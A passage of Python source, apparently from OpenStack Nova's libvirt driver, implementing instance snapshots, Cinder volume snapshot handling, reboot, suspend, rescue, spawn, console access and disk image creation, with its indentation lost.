# These restrictions can be relaxed as other configurations
# can be validated.
if self.has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm" and not source_format == 'rbd':
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
self._detach_pci_devices(virt_dom,
pci_manager.get_instance_pci_devs(instance))
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
snapshot_name,
image_type=source_format)
if live_snapshot:
LOG.info(_("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_("Beginning cold snapshot process"),
instance=instance)
snapshot_backend.snapshot_create()
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt_snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE (rmk): libvirt needs to be able to write to the
# temp directory, which is owned nova.
utils.execute('chmod', '777', tmpdir, run_as_root=True)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
if not live_snapshot:
snapshot_backend.snapshot_delete()
new_dom = None
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
new_dom = self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
new_dom = self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
if new_dom is not None:
self._attach_pci_devices(new_dom,
pci_manager.get_instance_pci_devs(instance))
LOG.info(_("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
image_service.update(context,
image_href,
metadata,
image_file)
LOG.info(_("Snapshot image upload complete"),
instance=instance)
@staticmethod
def _wait_for_block_job(domain, disk_path, abort_on_error=False):
status = domain.blockJobInfo(disk_path, 0)
if status == -1 and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if cur == end and cur != 0 and end != 0:
return False
else:
return True
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's running XML file
xml = domain.XMLDesc(0)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2', None,
out_path, image_format)
def _volume_snapshot_update_status(self, context, snapshot_id, status):
"""Send a snapshot status update to Cinder.
This method captures and logs exceptions that occur
since callers cannot do anything useful with these exceptions.
Operations on the Cinder side waiting for this will time out if
a failure occurs sending the update.
:param context: security context
:param snapshot_id: id of snapshot being updated
:param status: new status value
"""
try:
self._volume_api.update_snapshot_status(context,
snapshot_id,
status)
except Exception:
msg = _('Failed to send updated snapshot status '
'to volume service.')
LOG.exception(msg)
def _volume_snapshot_create(self, context, instance, domain,
volume_id, snapshot_id, new_file):
"""Perform volume snapshot.
:param domain: VM that volume is attached to
:param volume_id: volume UUID to snapshot
:param snapshot_id: UUID of snapshot being created
:param new_file: relative path to new qcow2 file present on share
"""
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
disks_to_snap = [] # to be snapshotted by libvirt
disks_to_skip = [] # local disks not snapshotted
for disk in device_info.devices:
if (disk.root_name != 'disk'):
continue
if (disk.target_dev is None):
continue
if (disk.serial is None or disk.serial != volume_id):
disks_to_skip.append(disk.source_path)
continue
# disk is a Cinder volume with the correct volume_id
disk_info = {
'dev': disk.target_dev,
'serial': disk.serial,
'current_file': disk.source_path
}
# Determine path for new_file based on current path
current_file = disk_info['current_file']
new_file_path = os.path.join(os.path.dirname(current_file),
new_file)
disks_to_snap.append((current_file, new_file_path))
if not disks_to_snap:
msg = _('Found no disk to snapshot.')
raise exception.NovaException(msg)
snapshot = vconfig.LibvirtConfigGuestSnapshot()
for current_name, new_filename in disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = current_name
snap_disk.source_path = new_filename
snap_disk.source_type = 'file'
snap_disk.snapshot = 'external'
snap_disk.driver_name = 'qcow2'
snapshot.add_disk(snap_disk)
for dev in disks_to_skip:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = dev
snap_disk.snapshot = 'no'
snapshot.add_disk(snap_disk)
snapshot_xml = snapshot.to_xml()
LOG.debug(_("snap xml: %s") % snapshot_xml)
snap_flags = (libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT)
QUIESCE = libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE
try:
domain.snapshotCreateXML(snapshot_xml,
snap_flags | QUIESCE)
return
except libvirt.libvirtError:
msg = _('Unable to create quiesced VM snapshot, '
'attempting again with quiescing disabled.')
LOG.exception(msg)
try:
domain.snapshotCreateXML(snapshot_xml, snap_flags)
except libvirt.libvirtError:
msg = _('Unable to create VM snapshot, '
'failing volume_snapshot operation.')
LOG.exception(msg)
raise
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
"""Create snapshots of a Cinder volume via libvirt.
:param instance: VM instance reference
:param volume_id: id of volume being snapshotted
:param create_info: dict of information used to create snapshots
- snapshot_id : ID of snapshot
- type : qcow2 / <other>
- new_file : qcow2 file created by Cinder which
becomes the VM's active image after
the snapshot is complete
"""
LOG.debug(_("volume_snapshot_create: instance: %(instance)s "
"create_info: %(c_info)s") % {'instance': instance['uuid'],
'c_info': create_info})
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
if create_info['type'] != 'qcow2':
raise exception.NovaException(_('Unknown type: %s') %
create_info['type'])
snapshot_id = create_info.get('snapshot_id', None)
if snapshot_id is None:
raise exception.NovaException(_('snapshot_id required '
'in create_info'))
try:
self._volume_snapshot_create(context, instance, virt_dom,
volume_id, snapshot_id,
create_info['new_file'])
except Exception:
with excutils.save_and_reraise_exception():
msg = _('Error occurred during volume_snapshot_create, '
'sending error status to Cinder.')
LOG.exception(msg)
self._volume_snapshot_update_status(
context, snapshot_id, 'error')
self._volume_snapshot_update_status(
context, snapshot_id, 'creating')
def _volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info=None):
"""
Note:
if file being merged into == active image:
do a blockRebase (pull) operation
else:
do a blockCommit operation
Files must be adjacent in snap chain.
:param instance: instance reference
:param volume_id: volume UUID
:param snapshot_id: snapshot UUID (unused currently)
:param delete_info: {
'type': 'qcow2',
'file_to_merge': 'a.img',
'merge_target_file': 'b.img' or None (if merging file_to_merge into
active image)
}
Libvirt blockjob handling required for this method is broken
in versions of libvirt that do not contain:
http://libvirt.org/git/?p=libvirt.git;h=0f9e67bfad (1.1.1)
(Patch is pending in 1.0.5-maint branch as well, but we cannot detect
libvirt 1.0.5.5 vs. 1.0.5.6 here.)
"""
if not self.has_min_version(MIN_LIBVIRT_BLOCKJOBINFO_VERSION):
ver = '.'.join([str(x) for x in MIN_LIBVIRT_BLOCKJOBINFO_VERSION])
msg = _("Libvirt '%s' or later is required for online deletion "
"of volume snapshots.") % ver
raise exception.Invalid(msg)
LOG.debug(_('volume_snapshot_delete: delete_info: %s') % delete_info)
if delete_info['type'] != 'qcow2':
msg = _('Unknown delete_info type %s') % delete_info['type']
raise exception.NovaException(msg)
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
##### Find dev name
my_dev = None
active_disk = None
xml = virt_dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
for disk in device_info.devices:
if (disk.root_name != 'disk'):
continue
if (disk.target_dev is None or disk.serial is None):
continue
if disk.serial == volume_id:
my_dev = disk.target_dev
active_disk = disk.source_path
if my_dev is None or active_disk is None:
msg = _('Unable to locate disk matching id: %s') % volume_id
raise exception.NovaException(msg)
LOG.debug(_("found dev, it's %(dev)s, with active disk: %(disk)s"),
{'dev': my_dev, 'disk': active_disk})
if delete_info['merge_target_file'] is None:
# pull via blockRebase()
# Merge the most recent snapshot into the active image
rebase_disk = my_dev
rebase_base = delete_info['file_to_merge']
rebase_bw = 0
rebase_flags = 0
LOG.debug(_('disk: %(disk)s, base: %(base)s, '
'bw: %(bw)s, flags: %(flags)s') %
{'disk': rebase_disk,
'base': rebase_base,
'bw': rebase_bw,
'flags': rebase_flags})
result = virt_dom.blockRebase(rebase_disk, rebase_base,
rebase_bw, rebase_flags)
if result == 0:
LOG.debug(_('blockRebase started successfully'))
while self._wait_for_block_job(virt_dom, rebase_disk,
abort_on_error=True):
LOG.debug(_('waiting for blockRebase job completion'))
time.sleep(0.5)
else:
# commit with blockCommit()
commit_disk = my_dev
commit_base = delete_info['merge_target_file']
commit_top = delete_info['file_to_merge']
bandwidth = 0
flags = 0
result = virt_dom.blockCommit(commit_disk, commit_base, commit_top,
bandwidth, flags)
if result == 0:
LOG.debug(_('blockCommit started successfully'))
while self._wait_for_block_job(virt_dom, commit_disk,
abort_on_error=True):
LOG.debug(_('waiting for blockCommit job completion'))
time.sleep(0.5)
def volume_snapshot_delete(self, context, instance, volume_id, snapshot_id,
delete_info=None):
try:
self._volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info=delete_info)
except Exception:
with excutils.save_and_reraise_exception():
msg = _('Error occurred during volume_snapshot_delete, '
'sending error status to Cinder.')
LOG.exception(msg)
self._volume_snapshot_update_status(
context, snapshot_id, 'error_deleting')
self._volume_snapshot_update_status(context, snapshot_id, 'deleting')
def reboot(self, context, instance, network_info, reboot_type='SOFT',
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
try:
soft_reboot_success = self._soft_reboot(instance)
except libvirt.libvirtError as e:
LOG.debug(_("Instance soft reboot failed: %s"), e)
soft_reboot_success = False
if soft_reboot_success:
LOG.info(_("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_("Failed to soft reboot instance. "
"Trying hard reboot."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
for x in xrange(CONF.libvirt_wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self.to_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self.get_instance_disk_info(instance['name'], xml,
block_device_info)
instance_dir = libvirt_utils.get_instance_path(instance)
self._create_images_and_backing(context, instance, instance_dir,
disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(xml, instance, network_info,
block_device_info, context=context,
reboot=True)
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def power_off(self, instance):
"""Power off the specified instance."""
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._detach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
dom.managedSave(0)
def resume(self, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
dom = self._create_domain_and_network(xml, instance, network_info,
block_device_info)
self._attach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
if self.instance_exists(instance['name']):
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
should not edit or over-ride the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
rescue_images = {
'image_id': CONF.rescue_image_id or instance['image_ref'],
'kernel_id': CONF.rescue_kernel_id or instance['kernel_id'],
'ramdisk_id': CONF.rescue_ramdisk_id or instance['ramdisk_id'],
}
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
None,
image_meta,
rescue=True)
self._create_image(context, instance,
disk_info['mapping'],
'.rescue', rescue_images,
network_info=network_info,
admin_pass=rescue_password)
xml = self.to_xml(context, instance, network_info, disk_info,
image_meta, rescue=rescue_images,
write_to_disk=True)
self._destroy(instance)
self._create_domain(xml)
def unrescue(self, instance, network_info):
"""Reboot the VM which is being rescued back into primary images.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
xml = libvirt_utils.load_file(unrescue_xml_path)
virt_dom = self._lookup_by_name(instance['name'])
self._destroy(instance)
self._create_domain(xml, virt_dom)
libvirt_utils.file_delete(unrescue_xml_path)
rescue_files = os.path.join(instance_dir, "*.rescue")
for rescue_file in glob.iglob(rescue_files):
libvirt_utils.file_delete(rescue_file)
def poll_rebooting_instances(self, timeout, instances):
pass
def _enable_hairpin(self, xml):
interfaces = self.get_interfaces(xml)
for interface in interfaces:
utils.execute('tee',
'/sys/class/net/%s/brport/hairpin_mode' % interface,
process_input='1',
run_as_root=True,
check_exit_code=[0, 1])
# NOTE(ilyaalekseyev): Implementation like in multinics
# for xenapi(tr3buchet)
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
self._create_image(context, instance,
disk_info['mapping'],
network_info=network_info,
block_device_info=block_device_info,
files=injected_files,
admin_pass=admin_password)
xml = self.to_xml(context, instance, network_info,
disk_info, image_meta,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, context=context)
LOG.debug(_("Instance is running"), instance=instance)
def _wait_for_boot():
"""Called at an interval until the VM is running."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance spawned successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_boot)
timer.start(interval=0.5).wait()
def _flush_libvirt_console(self, pty):
out, err = utils.execute('dd',
'if=%s' % pty,
'iflag=nonblock',
run_as_root=True,
check_exit_code=False)
return out
def _append_to_file(self, data, fpath):
LOG.info(_('data: %(data)r, fpath: %(fpath)r'),
{'data': data, 'fpath': fpath})
fp = open(fpath, 'a+')
fp.write(data)
return fpath
def get_console_output(self, instance):
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
tree = etree.fromstring(xml)
console_types = {}
# NOTE(comstud): We want to try 'file' types first, then try 'pty'
# types. We can't use Python 2.7 syntax of:
# tree.find("./devices/console[@type='file']/source")
# because we need to support 2.6.
console_nodes = tree.findall('./devices/console')
for console_node in console_nodes:
console_type = console_node.get('type')
console_types.setdefault(console_type, [])
console_types[console_type].append(console_node)
# If the guest has a console logging to a file prefer to use that
if console_types.get('file'):
for file_console in console_types.get('file'):
source_node = file_console.find('./source')
if source_node is None:
continue
path = source_node.get("path")
if not path:
continue
libvirt_utils.chown(path, os.getuid())
with libvirt_utils.file_open(path, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp,
MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes '
'ignored'), remaining, instance=instance)
return log_data
# Try 'pty' types
if console_types.get('pty'):
for pty_console in console_types.get('pty'):
source_node = pty_console.find('./source')
if source_node is None:
continue
pty = source_node.get("path")
if not pty:
continue
break
else:
msg = _("Guest does not have a console available")
raise exception.NovaException(msg)
self._chown_console_log_for_instance(instance)
data = self._flush_libvirt_console(pty)
console_log = self._get_console_log_path(instance)
fpath = self._append_to_file(data, console_log)
with libvirt_utils.file_open(fpath, 'rb') as fp:
log_data, remaining = utils.last_bytes(fp, MAX_CONSOLE_BYTES)
if remaining > 0:
LOG.info(_('Truncated console log returned, %d bytes ignored'),
remaining, instance=instance)
return log_data
@staticmethod
def get_host_ip_addr():
return CONF.my_ip
def get_vnc_console(self, instance):
def get_vnc_port_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'vnc':
return graphic.getAttribute('port')
# NOTE(rmk): We had VNC consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='vnc')
port = get_vnc_port_for_instance(instance['name'])
host = CONF.vncserver_proxyclient_address
return {'host': host, 'port': port, 'internal_access_path': None}
def get_spice_console(self, instance):
def get_spice_ports_for_instance(instance_name):
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
# TODO(sleepsonthefloor): use etree instead of minidom
dom = xmlutils.safe_minidom_parse_string(xml)
for graphic in dom.getElementsByTagName('graphics'):
if graphic.getAttribute('type') == 'spice':
return (graphic.getAttribute('port'),
graphic.getAttribute('tlsPort'))
# NOTE(rmk): We had Spice consoles enabled but the instance in
# question is not actually listening for connections.
raise exception.ConsoleTypeUnavailable(console_type='spice')
ports = get_spice_ports_for_instance(instance['name'])
host = CONF.spice.server_proxyclient_address
return {'host': host, 'port': ports[0],
'tlsPort': ports[1], 'internal_access_path': None}
@staticmethod
def _supports_direct_io(dirpath):
if not hasattr(os, 'O_DIRECT'):
LOG.debug(_("This python runtime does not support direct I/O"))
return False
testfile = os.path.join(dirpath, ".directio.test")
hasDirectIO = True
try:
f = os.open(testfile, os.O_CREAT | os.O_WRONLY | os.O_DIRECT)
os.close(f)
LOG.debug(_("Path '%(path)s' supports direct I/O") %
{'path': dirpath})
except OSError as e:
if e.errno == errno.EINVAL:
LOG.debug(_("Path '%(path)s' does not support direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
hasDirectIO = False
else:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking "
"direct I/O: '%(ex)s'") %
{'path': dirpath, 'ex': str(e)})
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Error on '%(path)s' while checking direct I/O: "
"'%(ex)s'") % {'path': dirpath, 'ex': str(e)})
finally:
try:
os.unlink(testfile)
except Exception:
pass
return hasDirectIO
@staticmethod
def _create_local(target, local_size, unit='G',
fs_format=None, label=None):
"""Create a blank image of specified size."""
libvirt_utils.create_image('raw', target,
'%d%c' % (local_size, unit))
def _create_ephemeral(self, target, ephemeral_size,
fs_label, os_type, is_block_dev=False):
if not is_block_dev:
self._create_local(target, ephemeral_size)
# Run as root only for block devices.
disk.mkfs(os_type, fs_label, target, run_as_root=is_block_dev)
@staticmethod
def _create_swap(target, swap_mb):
"""Create a swap file of specified size."""
libvirt_utils.create_image('raw', target, '%dM' % swap_mb)
utils.mkfs('swap', target)
@staticmethod
def _get_console_log_path(instance):
return os.path.join(libvirt_utils.get_instance_path(instance),
'console.log')
def _chown_console_log_for_instance(self, instance):
console_log = self._get_console_log_path(instance)
if os.path.exists(console_log):
libvirt_utils.chown(console_log, os.getuid())
def _create_image(self, context, instance,
disk_mapping, suffix='',
disk_images=None, network_info=None,
block_device_info=None, files=None,
admin_pass=None, inject_files=True):
if not suffix:
suffix = ''
booted_from_volume = (
(not bool(instance.get('image_ref')))
or 'disk' not in disk_mapping
)
# syntactic nicety
def basepath(fname='', suffix=suffix):
return os.path.join(libvirt_utils.get_instance_path(instance),
fname + suffix)
def image(fname, image_type=CONF.libvirt_images_type):
return self.image_backend.image(instance,
fname + suffix, image_type)
def raw(fname):
return image(fname, image_type='raw')
# ensure directories exist and are writable
fileutils.ensure_tree(basepath(suffix=''))
LOG.info(_('Creating image'), instance=instance)
# NOTE(dprince): for rescue console.log may already exist... chown it.
self._chown_console_log_for_instance(instance)
# NOTE(vish): No need add the suffix to console.log
libvirt_utils.write_to_file(
self._get_console_log_path(instance), '', 7)
if not disk_images:
disk_images = {'image_id': instance['image_ref'],
'kernel_id': instance['kernel_id'],
'ramdisk_id': instance['ramdisk_id']}
if disk_images['kernel_id']:
fname = imagecache.get_cache_fname(disk_images, 'kernel_id')
raw('kernel').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['kernel_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
if disk_images['ramdisk_id']:
fname = imagecache.get_cache_fname(disk_images, 'ramdisk_id')
raw('ramdisk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=fname,
image_id=disk_images['ramdisk_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
inst_type = flavors.extract_flavor(instance)
# NOTE(ndipanov): Even if disk_mapping was passed in, which
# currently happens only on rescue - we still don't want to
# create a base image.
if not booted_from_volume:
root_fname = imagecache.get_cache_fname(disk_images, 'image_id')
size = instance['root_gb'] * unit.Gi
if size == 0 or suffix == '.rescue':
size = None
image('disk').cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=root_fname,
size=size,
image_id=disk_images['image_id'],
user_id=instance['user_id'],
project_id=instance['project_id'])
# Lookup the filesystem type if required
os_type_with_default = instance['os_type']
if not os_type_with_default:
os_type_with_default = 'default'
ephemeral_gb = instance['ephemeral_gb']
if 'disk.local' in disk_mapping:
disk_image = image('disk.local')
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral0',
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
fname = "ephemeral_%s_%s" % (ephemeral_gb, os_type_with_default)
size = ephemeral_gb * unit.Gi
disk_image.cache(fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=ephemeral_gb)
for idx, eph in enumerate(driver.block_device_info_get_ephemerals(
block_device_info)):
disk_image = image(blockinfo.get_eph_disk(idx))
fn = functools.partial(self._create_ephemeral,
fs_label='ephemeral%d' % idx,
os_type=instance["os_type"],
is_block_dev=disk_image.is_block_dev)
size = eph['size'] * unit.Gi
fname = "ephemeral_%s_%s" % (eph['size'], os_type_with_default)
disk_image.cache(
fetch_func=fn,
filename=fname,
size=size,
ephemeral_size=eph['size'])
if 'disk.swap' in disk_mapping:
mapping = disk_mapping['disk.swap']
swap_mb = 0
swap = driver.block_device_info_get_swap(block_device_info)
if driver.swap_is_usable(swap):
swap_mb = swap['swap_size']
elif (inst_type['swap'] > 0 and
not block_device.volume_in_mapping(
mapping['dev'], block_device_info)):
swap_mb = inst_type['swap']
if swap_mb > 0:
size = swap_mb * unit.Mi
image('disk.swap').cache(fetch_func=self._create_swap,
filename="swap_%s" % swap_mb,
size=size,
swap_mb=swap_mb)
# Config drive
if configdrive.required_by(instance):
LOG.info(_('Using config drive'), instance=instance)
extra_md = {}
if admin_pass:
extra_md['admin_pass'] = admin_pass
inst_md = instance_metadata.InstanceMetadata(instance,
content=files, extra_md=extra_md, network_info=network_info)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
configdrive_path = basepath(fname='disk.config')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path}, instance=instance)
try:
cdb.make_drive(configdrive_path)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed '
'with error: %s'),
e, instance=instance)
# File injection only if needed
elif inject_files and CONF.libvirt_inject_partition != -2:
if booted_from_volume:
LOG.warn(_('File injection into a boot from volume '
'instance is not supported'), instance=instance)
target_partition = None
if not instance['kernel_id']:
target_partition = CONF.libvirt_inject_partition
if target_partition == 0:
target_partition = None
if CONF.libvirt_type == 'lxc':
target_partition = None
if CONF.libvirt_inject_key and instance['key_data']:
key = str(instance['key_data'])
else:
key = None
net = netutils.get_injected_network_template(network_info)
metadata = instance.get('metadata')
if not CONF.libvirt_inject_password:
admin_pass = None
if any((key, net, metadata, admin_pass, files)):
# If we're not using config_drive, inject into root fs
injection_path = image('disk').path
img_id = instance['image_ref']
for inj, val in [('key', key),
('net', net),
('metadata', metadata),
('admin_pass', admin_pass),
('files', files)]:
if val:
LOG.info(_('Injecting %(inj)s into image '
'%(img_id)s'),
{'inj': inj, 'img_id': img_id},
instance=instance)
try:
